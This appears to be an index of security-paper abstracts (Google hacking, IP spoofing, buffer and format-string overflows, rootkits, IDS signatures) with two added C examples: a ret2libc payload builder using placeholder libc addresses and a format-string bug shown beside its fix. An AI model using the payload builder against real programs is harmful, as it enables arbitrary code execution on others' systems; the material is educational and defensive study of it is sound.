Googling Up Passwords
I'm not putting down Google. Far from it: it's a great search engine, and I use it all the time. I couldn't do my many jobs without Google, so I've spent some time learning how to maximize its value, how to find exactly what I want, how to plumb its depths to find just the right nugget of information that I need. In the same way that Google can be used for good, though, it can also be used by malevolent individuals to root out vulnerabilities, discover passwords and other sensitive data, and in general find out way more about systems than they need to know. And, of course, Google's not the only game in town -- but it is certainly the biggest, the most widely-used, and in many ways the easiest to use.
IP Spoofing: An Introduction
Criminals have long employed the tactic of masking their true identity, from disguises to aliases to caller-id blocking. It should come as no surprise then, that criminals who conduct their nefarious activities on networks and computers should employ such techniques. IP spoofing is one of the most common forms of on-line camouflage. In IP spoofing, an attacker gains unauthorized access to a computer or a network by making it appear that a malicious message has come from a trusted machine by "spoofing" the IP address of that machine. In this article, we will examine the concepts of IP spoofing: why it is possible, how it works, what it is used for and how to defend against it.
Exploitation - Returning into libc
The intention of this article is not to teach you the ins and outs of buffer overflows, but to explain in a little detail another technique for executing arbitrary code, as opposed to the classic 'NOP sled + shellcode + repeated retaddr' method. I assume readers are familiar with buffer overflow vulnerabilities and the basics of how to exploit them. A little theory of memory organization is also desirable, such as how little-endian byte ordering works. To those who are not familiar with buffer overflow bugs, I suggest you read "Smashing the Stack for Fun and Profit".
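As an added illustration of the two points the abstract leans on (little-endian byte ordering and the return-into-libc frame), the following C builds the classic ret2libc payload for a 32-bit little-endian target: filler up to the saved return address, then the address of system(), then the address exit() will be "returned" into when system() finishes, then the address of a "/bin/sh" string as system()'s argument. This is example code written for this page, not code from the article; the buffer-to-saved-EIP distance and the libc addresses used in main() are placeholder values chosen for the demonstration, not addresses taken from any real binary.

```c
/* Added example: ret2libc payload layout for a 32-bit little-endian stack.
 * The addresses and the distance to the saved return address are assumed
 * placeholders; on a real target they come from the debugger. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Store a 32-bit value little-endian: least significant byte first.
 * 0xb7e5f430 is written as the bytes 30 f4 e5 b7. */
void pack32le(uint8_t *out, uint32_t v) {
    out[0] = (uint8_t)(v & 0xff);
    out[1] = (uint8_t)((v >> 8) & 0xff);
    out[2] = (uint8_t)((v >> 16) & 0xff);
    out[3] = (uint8_t)((v >> 24) & 0xff);
}

/* Read a little-endian 32-bit value back, so the layout can be verified. */
uint32_t unpack32le(const uint8_t *in) {
    return (uint32_t)in[0] | ((uint32_t)in[1] << 8) |
           ((uint32_t)in[2] << 16) | ((uint32_t)in[3] << 24);
}

/* Layout: [filler x dist_to_ret][system()][exit()][&"/bin/sh"]
 *   dist_to_ret  bytes from the start of the overflowed buffer to the
 *                saved return address (covers locals and the saved EBP)
 *   system_addr  overwrites the saved EIP, so the function returns into system()
 *   exit_addr    sits where system() expects its own return address
 *   binsh_addr   sits where system() expects its first argument
 * Returns the payload length, or 0 if it does not fit in cap. */
size_t build_ret2libc(uint8_t *out, size_t cap, size_t dist_to_ret,
                      uint32_t system_addr, uint32_t exit_addr,
                      uint32_t binsh_addr) {
    size_t len = dist_to_ret + 3 * 4;
    if (len > cap) return 0;
    memset(out, 'A', dist_to_ret);
    pack32le(out + dist_to_ret, system_addr);
    pack32le(out + dist_to_ret + 4, exit_addr);
    pack32le(out + dist_to_ret + 8, binsh_addr);
    return len;
}

int main(void) {
    uint8_t payload[64];
    /* Placeholder values for the demonstration, not real addresses. */
    size_t n = build_ret2libc(payload, sizeof payload, 20,
                              0xb7e5f430u, 0xb7e52f80u, 0xb7f7e0cfu);
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", payload[i], (i % 16 == 15 || i + 1 == n) ? "\n" : " ");
    return 0;
}
```

Because system() is entered through a return rather than a call, the word right after its address is read as its return address, which is why exit()'s address goes there; the argument follows one word later. Any null byte in one of the three addresses will terminate a strcpy-style overflow, so the check on the packed bytes is the first thing to do when a payload fails.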
Adjacent Overwrite BUG
This article is meant to be an informative, step-by-step log of exploiting an adjacent memory overflow. It is aimed at those who have buffer overflow experience and, hopefully, knowledge of the organization of the stack. An article with a very good overview and introduction to this topic has been published in Phrack magazine; I suggest you read that and use this text as a reference for the theory presented there.
Stack Overflows
Covers a vulnerability commonly found in the wild: the stack overflow. Explains and provides examples of stack overflows.
CASR - ACAT: PHP TopSites Vulnerability Report
The purpose of this document is to show several vulnerabilities and provide fixes for the PHP TopSites Pro/Free script. This report is published for educational purposes only. The authors take no responsibility for damage resulting from the misuse of this information. All copyrights are retained by the authors. This information may not be reproduced without prior written consent from the authors.
Format String Attacks
These slides show a picture of what's happening on the stack during such an attack.
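To make concrete what the slides picture, here is an added C example (not taken from the slides) of the bug itself: untrusted text handed to a printf-family function as the format string, next to the corrected call that passes it as a "%s" argument, plus a small check that rejects input carrying a conversion specifier. The input strings are constructed for the demonstration and deliberately use only "%%", which is well-defined without arguments, so the program runs without undefined behaviour.

```c
/* Added example: format string bug beside its fix. The inputs are
 * constructed here; they are not from the slides listed above. */
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: the attacker's text is the format string, so every
 * '%' directive in it is interpreted. "%x" reads words off the stack,
 * "%n" writes the count of bytes printed so far to a pointer taken from
 * the stack, which is how the attack turns into an arbitrary write. */
int log_unsafe(char *out, size_t cap, const char *user) {
    return snprintf(out, cap, user);
}

/* Fixed pattern: the text is an argument; '%' characters are copied
 * literally and never reach the format parser. */
int log_safe(char *out, size_t cap, const char *user) {
    return snprintf(out, cap, "%s", user);
}

/* Defence in depth for code that must build a format string from external
 * data: returns 1 if the string contains a conversion specifier, treating
 * "%%" as a literal percent sign. */
int has_format_directive(const char *s) {
    for (; *s; s++) {
        if (*s == '%') {
            if (s[1] == '%') { s++; continue; }
            return 1;
        }
    }
    return 0;
}

int main(void) {
    char buf[64];
    const char *input = "100%% done";          /* constructed sample input */
    log_unsafe(buf, sizeof buf, input);
    printf("unsafe: %s\n", buf);               /* the %% was interpreted */
    log_safe(buf, sizeof buf, input);
    printf("safe:   %s\n", buf);               /* the %% was copied as-is */
    printf("\"%%x.%%x.%%n\" has directive: %d\n",
           has_format_directive("%x.%x.%n"));
    return 0;
}
```

Compilers flag the vulnerable call with -Wformat-security; treating that warning as an error is the cheapest way to keep the pattern out of a code base.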
Improving the Security of Your Site by Breaking Into it
*The early '90s perspective* "In this paper we will take an unusual approach to system security. Instead of merely saying that something is a problem, we will look through the eyes of a potential intruder, and show why it is one..."
The easiest way to get around SSL
This paper explains how it is often possible, with the simple substitution of a string, to get around a "secure" implementation based on an incorrect use of SSL. Please note that this document does not contain any information about weaknesses of the SSL protocol itself.
Known Attacks Against Smartcards
This document analyzes, from a technical point of view, currently known attacks against smart card implementations. The purpose of this analysis is to give the necessary background for the assessment of the mechanisms that can enhance the security of smart cards. This document is mainly intended for people who are considering the use of cryptographic modules and who need to compare several options with respect to their security.
The Art of Rootkits (2nd ed)
A rootkit is a program. Rootkits come in all different shapes and styles, some more advanced than others. Rootkits are basically programs that help attackers keep their position as root. Notice that it's called a "rootkit": 'root' meaning the highest level of administration on *nix based systems and 'kit' meaning a collection of tools. Rootkits contain tools which help attackers hide their presence as well as give the attacker full control of the server or host continuously without being noticed. Rootkits are usually installed on systems after they have been successfully compromised and the highest level of access has been obtained (usually root). Some rootkits refuse to be installed until the attacker has root access, because they need read and write permission to certain files. Once the system has been successfully compromised and the attacker has root, he or she may then install the rootkit, allowing them to cover their tracks and wipe the log files.
Hacker Tools and Their Signatures, Part One: bind8x.c
This article is the first in a series of papers detailing hacker exploits/tools and their signatures. This installment will examine the Berkeley Internet Name Domain exploit bind8x.c. The discussion will cover the details of bind8x.c and provide signatures that will assist an IDS analyst in detecting it. This paper assumes that the reader has some basic knowledge of TCP/IP and understands the tcpdump format.